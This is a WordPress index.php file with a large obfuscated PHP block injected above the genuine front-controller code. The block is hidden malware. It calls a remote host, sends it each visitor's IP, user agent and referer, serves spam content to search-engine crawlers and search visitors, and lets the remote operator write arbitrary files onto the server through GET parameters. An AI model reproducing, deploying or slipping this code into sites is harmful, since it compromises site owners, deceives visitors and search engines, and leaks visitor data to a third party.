<?php
error_reporting(0);header('Content-Type: text/html; charset=utf-8');$OoooOO0 = 'fgs1117';$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c";$O=urldecode($OOOOOO);date_default_timezone_set($O{35}.$O{29}.$O{47});$OO = @$_SERVER[$O{38}.$O{34}.$O{47}.$O{32}.$O{51}.$O{28}.$O{50}.$O{30}.$O{52}.$O{29}.$O{34}.$O{34}.$O{30}];$Oo = @$_SERVER[$O{29}.$O{28}.$O{26}.$O{32}.$O{28}.$O{37}.$O{30}.$O{52}.$O{32}.$O{29}.$O{33}];$o0o0oOO000 = @basename(__FILE__);$OoO = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{41}.$O{34}.$O{37}.$O{30}];$Ooolg = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{36}.$O{47}.$O{47}.$O{28}.$O{35}.$O{30}.$O{52}.$O{44}.$O{36}.$O{50}.$O{40}.$O{32}.$O{36}.$O{40}.$O{28}];$OOOOO = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{32}.$O{37}.$O{28}.$O{29}.$O{52}.$O{36}.$O{40}.$O{28}.$O{50}.$O{30}];$OOOOOo = @$_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{29}.$O{28}.$O{39}.$O{28}.$O{29}.$O{28}.$O{29}];$OOOOOOO = ((isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{37}]) && $_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{37}] == $O{8}.$O{24}) || (isset($_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{46}.$O{52}.$O{39}.$O{34}.$O{29}.$O{27}.$O{36}.$O{29}.$O{38}.$O{28}.$O{38}.$O{52}.$O{35}.$O{29}.$O{34}.$O{30}.$O{34}]) && $_SERVER[$O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{46}.$O{52}.$O{39}.$O{34}.$O{29}.$O{27}.$O{36}.$O{29}.$O{38}.$O{28}.$O{38}.$O{52}.$O{35}.$O{29}.$O{34}.$O{30}.$O{34}] == $O{15}.$O{4}.$O{4}.$O{9}.$O{11})) ? $O{15}.$O{4}.$O{4}.$O{9}.$O{11}.$O{62}.$O{63}.$O{63} : $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63};$OOOOOOOo = $OOOOOOO . $OoO;$OOOOO = @strtolower($OOOOO);$OOOOOo = @strtolower($OOOOOo);if(getenv($O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{47}.$O{44}.$O{33}.$O{28}.$O{50}.$O{30}.$O{52}.$O{33}.$O{35})){$oo00oo00 = getenv($O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{47}.$O{44}.$O{33}.$O{28}.$O{50}.$O{30}.$O{52}.$O{33}.$O{35});} elseif(getenv($O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{46}.$O{52}.$O{39}.$O{34}.$O{29}.$O{27}.$O{36}.$O{29}.$O{38}.$O{28}.$O{38}.$O{52}.$O{39}.$O{34}.$O{29})) {$oo00oo00 = getenv($O{41}.$O{30}.$O{30}.$O{35}.$O{52}.$O{46}.$O{52}.$O{39}.$O{34}.$O{29}.$O{27}.$O{36}.$O{29}.$O{38}.$O{28}.$O{38}.$O{52}.$O{39}.$O{34}.$O{29});} elseif(getenv($O{29}.$O{28}.$O{51}.$O{34}.$O{30}.$O{28}.$O{52}.$O{36}.$O{38}.$O{38}.$O{29})) {$oo00oo00 = getenv($O{29}.$O{28}.$O{51}.$O{34}.$O{30}.$O{28}.$O{52}.$O{36}.$O{38}.$O{38}.$O{29});} else {$oo00oo00 = $_SERVER[$O{29}.$O{28}.$O{51}.$O{34}.$O{30}.$O{28}.$O{52}.$O{36}.$O{38}.$O{38}.$O{29}];}if(isset($_GET[$O{22}.$O{13}])&&$_GET[$O{22}.$O{13}]==$O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{57}.$O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{88};exit;}if (strstr($Oo, $O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{52}.$O{7}.$O{24}.$O{12}.$O{2}.$O{20}.$O{52})) {$Ooooo = dirname($Oo);OooooOOOOoo($O,$OoooOO0,$OOOOOOOo,$Oo,$OoO,$OOOOOOO,$Ooooo);}if (strstr($Oo, $O{59}.$O{20}.$O{25}.$O{18})) {$Ooooo = dirname($Oo);OooooO($O,$OoooOO0,$OOOOOOOo,$Oo,$OOOOOOO,$OoO,$oo00oo00,$Ooooo);}function OooooOOOOoo($O,$OoooOO0,$OOOOOOOo,$Oo,$OoO,$OOOOOOO,$Ooooo){$Oooooo = $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{36}.$O{9}.$O{7}.$O{63}.$O{11}.$O{7}.$O{4}.$O{2}.$O{36}.$O{18}.$O{18}.$O{51}.$O{10}.$O{9}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{9}.$O{1}.$O{12}.$O{61}.$O{11}.$O{18}.$O{64}.$O{65}.$O{66}.$O{78}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OOOOOOOo.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000;if ($_GET[$O{22}.$O{13}.$O{52}.$O{10}.$O{18}.$O{18}.$O{25}.$O{10}.$O{9}] == $O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $Oooooo;exit;}$Ooooooo = json_decode(OooooOO($O,$Oooooo), true);if (empty($Ooooooo)||$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 404) {header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});header($O{37}.$O{4}.$O{10}.$O{4}.$O{6}.$O{11}.$O{62}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});exit();}if (empty($Ooooooo)||$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 444) {header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});header($O{37}.$O{4}.$O{10}.$O{4}.$O{6}.$O{11}.$O{62}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});exit();}$Oooooooo = $Ooooooo[$O{12}.$O{10}.$O{4}.$O{10}];header($O{47}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{53}.$O{4}.$O{5}.$O{9}.$O{2}.$O{62}.$O{4}.$O{2}.$O{20}.$O{4}.$O{63}.$O{20}.$O{25}.$O{18});echo $Oooooooo;exit();}function OooooO($O,$OoooOO0,$OOOOOOOo,$Oo,$OOOOOOO,$OoO,$oo00oo00,$Ooooo='',$o0o0oo='') {$Oooooo = $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{36}.$O{9}.$O{7}.$O{63}.$O{11}.$O{7}.$O{4}.$O{2}.$O{32}.$O{3}.$O{18}.$O{36}.$O{9}.$O{7}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{11}.$O{4}.$O{5}.$O{9}.$O{2}.$O{61}.$O{11}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{78}.$O{24}.$O{6}.$O{25}.$O{61}.$O{68}.$O{67}.$O{67}.$O{67}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{6}.$O{3}.$O{18}.$O{61}.$Oo.$O{78}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OOOOOOOo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000;if ($_GET[$O{22}.$O{13}.$O{52}.$O{25}.$O{10}.$O{9}] == $O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $Oooooo;exit;}$Ooooooo = json_decode(OooooOO($O,$Oooooo), true);if (isset($Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}])&&$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}]==$O{68}.$O{67}.$O{67}) {$Oooooooo = $Ooooooo[$O{12}.$O{10}.$O{4}.$O{10}];foreach($Oooooooo as $Oog => $Oov){$o0o0oooo = OooooOO($O,$Oov);$Oooo0s = (strpos($o0o0oooo,$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{57}.$O{50}.$O{8}.$O{4}.$O{7}.$O{13}.$O{7}.$O{21}.$O{10}.$O{4}.$O{7}.$O{8}.$O{24}.$O{57}.$O{29}.$O{2}.$O{21}.$O{2}.$O{7}.$O{22}.$O{2}.$O{12}) !== false) ? $O{34}.$O{43} : $O{28}.$O{29}.$O{29}.$O{34}.$O{29};echo $Oov.$O{61}.$O{61}.$O{61}.$O{56}.$O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{62}.$O{57}.$Oooo0s.PHP_EOL;}exit();}if (isset($Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}])&&$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}]==$O{70}.$O{67}.$O{68}){echo $O{37}.$O{6}.$O{23}.$O{25}.$O{7}.$O{4}.$O{4}.$O{7}.$O{24}.$O{14}.$O{57}.$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{57}.$O{37}.$O{7}.$O{4}.$O{2}.$O{25}.$O{10}.$O{9}.$O{57}.$O{29}.$O{2}.$O{4}.$O{6}.$O{3}.$O{24}.$O{57}.$O{39}.$O{10}.$O{7}.$O{18};exit();}if (empty($Ooooooo)||$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 404) {header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});header($O{37}.$O{4}.$O{10}.$O{4}.$O{6}.$O{11}.$O{62}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});exit();}$Oooooooo = $Ooooooo[$O{12}.$O{10}.$O{4}.$O{10}];header($O{47}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{53}.$O{4}.$O{5}.$O{9}.$O{2}.$O{62}.$O{4}.$O{2}.$O{20}.$O{4}.$O{63}.$O{20}.$O{25}.$O{18});echo $Oooooooo;exit();}if(isset($_GET[$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}])){$OoOO=$_GET[$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}];if (preg_match($O{63}.$O{79}.$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{89}.$O{55}.$O{76}.$O{83}.$O{59}.$O{15}.$O{4}.$O{25}.$O{18}.$O{77}.$O{80}.$O{63}.$O{7}, $OoOO)) {if(OooooOOOO($O,$OoOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{53}.$O{11}.$O{7}.$O{4}.$O{2}.$O{53}.$O{22}.$O{2}.$O{3}.$O{7}.$O{13}.$O{7}.$O{21}.$O{10}.$O{4}.$O{7}.$O{8}.$O{24}.$O{62}.' '.$OoOO)){exit($O{58}.$O{10}.$O{57}.$O{15}.$O{3}.$O{2}.$O{13}.$O{61}.$OoOO.$O{56}.$OoOO.$O{58}.$O{63}.$O{10}.$O{56});} else{exit($O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{88}.$O{88}.$O{88});}}}if(isset($_GET[$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}])){$both = '';$o0o0o = $_GET[$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}];$Oooooo = $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{36}.$O{9}.$O{7}.$O{63}.$O{3}.$O{8}.$O{23}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{3}.$O{8}.$O{23}.$O{61}.$o0o0o.$O{78}.$O{9}.$O{1}.$O{12}.$O{61}.$O{11}.$O{18}.$O{64}.$O{65}.$O{66}.$O{78}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OOOOOOOo.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000;if ($_GET[$O{22}.$O{13}.$O{52}.$O{23}.$O{8}.$O{4}] == $O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $Oooooo;exit;}$Ooooooo = json_decode(OooooOO($O,$Oooooo), true);if (empty($Ooooooo)||$Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 404) {header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});header($O{37}.$O{4}.$O{10}.$O{4}.$O{6}.$O{11}.$O{62}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});exit();}$Oooooooo = $Ooooooo[$O{12}.$O{10}.$O{4}.$O{10}];if(OooooOOOO($O,$O{3}.$O{8}.$O{23}.$O{8}.$O{4}.$O{11}.$O{59}.$O{4}.$O{20}.$O{4},$Oooooooo)) {echo $Oooooooo;exit();} else {exit($O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{88}.$O{88});}}if(preg_match($O{63}.$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{59}.$O{21}.$O{8}.$O{59}.$O{16}.$O{9}.$O{90}.$O{5}.$O{10}.$O{15}.$O{8}.$O{8}.$O{90}.$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{83}.$O{59}.$O{21}.$O{8}.$O{25}.$O{81}.$O{79}.$O{59}.$O{82}.$O{89}.$O{55}.$O{80}.$O{90}.$O{23}.$O{7}.$O{24}.$O{14}.$O{63}.$O{7}, $OOOOOo)){if ($_GET[$O{22}.$O{13}.$O{52}.$O{16}.$O{6}.$O{25}.$O{9}] == $O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{16}.$O{6}.$O{25}.$O{9}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{23}.$O{8}.$O{4}.$O{61}.$O{67}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{3}.$O{2}.$O{13}.$O{2}.$O{3}.$O{61}.$OOOOOo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{18}.$O{14}.$O{61}.$Ooolg.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000;exit;}$o0o0ooo=OooooOO($O,$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{16}.$O{6}.$O{25}.$O{9}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{23}.$O{8}.$O{4}.$O{61}.$O{67}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{3}.$O{2}.$O{13}.$O{2}.$O{3}.$O{61}.$OOOOOo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{18}.$O{14}.$O{61}.$Ooolg.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000);if ($o0o0ooo) {echo $o0o0ooo;exit();}}if(stristr($OOOOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4})||stristr($OOOOO,$O{23}.$O{7}.$O{24}.$O{14})||stristr($OOOOO,$O{31}.$O{88}.$O{42})||stristr($OOOOO,$O{5}.$O{88}.$O{16})||stristr($OOOOO,$O{5}.$O{10}.$O{15}.$O{8}.$O{8})||stristr($OOOOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2})||stristr($OOOOO,$O{40}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4})||stristr($OOOOO,$O{14}.$O{8}.$O{8}.$O{14}.$O{18}.$O{2}.$O{23}.$O{8}.$O{4})){if ($_GET[$O{22}.$O{13}.$O{52}.$O{23}.$O{8}.$O{4}] == $O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{73}.$O{64}.$O{71}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{23}.$O{8}.$O{4}.$O{61}.$O{64}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{18}.$O{14}.$O{61}.$Ooolg.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000;exit;}$OooOO = OooooOO($O,$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{73}.$O{64}.$O{71}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{23}.$O{8}.$O{4}.$O{61}.$O{64}.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{18}.$O{14}.$O{61}.$Ooolg.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000);if(!empty($OooOO)){$Ooooooo = json_decode($OooOO, true);if ($Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 404) {header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{67}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});header($O{37}.$O{4}.$O{10}.$O{4}.$O{6}.$O{11}.$O{62}.$O{57}.$O{70}.$O{67}.$O{70}.$O{57}.$O{50}.$O{8}.$O{4}.$O{57}.$O{39}.$O{8}.$O{6}.$O{24}.$O{12});exit();}if ($Ooooooo[$O{21}.$O{8}.$O{12}.$O{2}] == 500) {header($O{41}.$O{30}.$O{30}.$O{35}.$O{63}.$O{64}.$O{59}.$O{64}.$O{57}.$O{69}.$O{67}.$O{67}.$O{57}.$O{33}.$O{24}.$O{4}.$O{2}.$O{3}.$O{24}.$O{10}.$O{18}.$O{57}.$O{37}.$O{2}.$O{3}.$O{22}.$O{2}.$O{3}.$O{57}.$O{28}.$O{3}.$O{3}.$O{8}.$O{3});exit();}echo $OooOO;exit;}}if ($_GET[$O{22}.$O{13}.$O{52}.$O{8}.$O{3}.$O{7}.$O{14}.$O{7}.$O{24}] == $O{8}.$O{24}.$O{18}.$O{7}.$O{24}.$O{2}.$O{69}.$O{69}.$O{68}.$O{68}) {echo $O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{8}.$O{3}.$O{14}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{18}.$O{14}.$O{61}.$Ooolg.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000;exit;}OooooOO($O,$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$OoooOO0.$O{59}.$O{9}.$O{10}.$O{11}.$O{4}.$O{10}.$O{11}.$O{11}.$O{59}.$O{20}.$O{5}.$O{19}.$O{63}.$O{8}.$O{3}.$O{14}.$O{59}.$O{9}.$O{15}.$O{9}.$O{55}.$O{12}.$O{8}.$O{25}.$O{10}.$O{7}.$O{24}.$O{61}.$OoO.$O{78}.$O{9}.$O{10}.$O{14}.$O{2}.$O{61}.$Oo.$O{78}.$O{9}.$O{3}.$O{61}.$Ooooo.$O{78}.$O{7}.$O{9}.$O{61}.$oo00oo00.$O{78}.$O{18}.$O{14}.$O{61}.$Ooolg.$O{78}.$O{21}.$O{6}.$O{3}.$O{61}.$o0o0oOO000);function OooooOO($O,$OooO){$OooOO = '';$OooOOO = $O{51}.$O{8}.$O{19}.$O{7}.$O{18}.$O{18}.$O{10}.$O{63}.$O{70}.$O{59}.$O{67}.$O{57}.$O{76}.$O{21}.$O{8}.$O{25}.$O{9}.$O{10}.$O{4}.$O{7}.$O{23}.$O{18}.$O{2}.$O{75}.$O{51}.$O{37}.$O{33}.$O{28}.$O{57}.$O{68}.$O{59}.$O{67}.$O{75}.$O{27}.$O{7}.$O{24}.$O{12}.$O{8}.$O{1}.$O{11}.$O{57}.$O{50}.$O{30}.$O{57}.$O{69}.$O{59}.$O{65}.$O{75}.$O{59}.$O{50}.$O{28}.$O{30}.$O{57}.$O{47}.$O{44}.$O{29}.$O{57}.$O{64}.$O{59}.$O{64}.$O{59}.$O{70}.$O{66}.$O{65}.$O{65}.$O{77};if(function_exists($O{21}.$O{6}.$O{3}.$O{18}.$O{52}.$O{7}.$O{24}.$O{7}.$O{4})){try{$OooOOOO = curl_init();$OoooOO = 30;curl_setopt($OooOOOO,CURLOPT_URL,$OooO);curl_setopt($OooOOOO,CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($OooOOOO,CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($OooOOOO,CURLOPT_RETURNTRANSFER,1);curl_setopt($OooOOOO,CURLOPT_CONNECTTIMEOUT,$OoooOO);$OooOO = curl_exec($OooOOOO);curl_close($OooOOOO);}catch (Exception $e){}}if(strlen($OooOO)<1&&function_exists($O{13}.$O{7}.$O{18}.$O{2}.$O{52}.$O{14}.$O{2}.$O{4}.$O{52}.$O{21}.$O{8}.$O{24}.$O{4}.$O{2}.$O{24}.$O{4}.$O{11})){ini_set($O{6}.$O{11}.$O{2}.$O{3}.$O{52}.$O{10}.$O{14}.$O{2}.$O{24}.$O{4},$OooOOO);try{$OooOO = @file_get_contents($OooO);}catch (Exception $e){}}return $OooOO;}function OooooOOOO($O,$Ooo, $OooOOOOO) {$OoooO = fopen($Ooo, $O{1}) or die('0');$result = fwrite($OoooO, $OooOOOOO);fclose($OoooO);return $result;}?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );